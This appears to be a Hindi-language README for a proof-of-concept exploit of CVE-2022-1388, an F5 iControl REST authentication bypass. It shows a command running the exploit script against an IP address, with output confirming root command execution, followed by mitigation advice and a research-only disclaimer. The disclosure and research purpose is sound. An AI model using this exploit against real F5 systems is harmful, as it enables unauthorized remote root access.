
CVE-2022-1388 के लिए POC
CVE-2022-1388 के लिए POC जो कई F5 उत्पादों को प्रभावित करता है।
इस कमजोरी का तकनीकी मूल कारण विश्लेषण हमारे ब्लॉग पर पाया जा सकता है: https://www.horizon3.ai/f5-icontrol-rest-endpoint-authentication-bypass-technical-deep-dive/
इस कमजोरी का शोषण करने के लिए एक अनुरोध की आवश्यक शर्तें:
root@kali:/home/dev# python3 CVE-2022-1388.py -t 192.168.0.221 -c id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0
नवीनतम संस्करण में अपडेट करें या F5 Security Advisory के भीतर दिए गए निर्देशों का पालन करके शमन करें
यह सॉफ़्टवेयर पूर्ण रूप से शैक्षणिक अनुसंधान और प्रभावी रक्षात्मक तकनीकों के विकास के उद्देश्यों के लिए बनाया गया है, और स्पष्ट रूप से अधिकृत किए जाने के अलावा सिस्टम पर हमला करने के लिए उपयोग किए जाने का इरादा नहीं है। परियोजना अनुरक्षक सॉफ़्टवेयर के दुरुपयोग के लिए उत्तरदायी या ज़िम्मेदार नहीं हैं। जिम्मेदारी से उपयोग करें।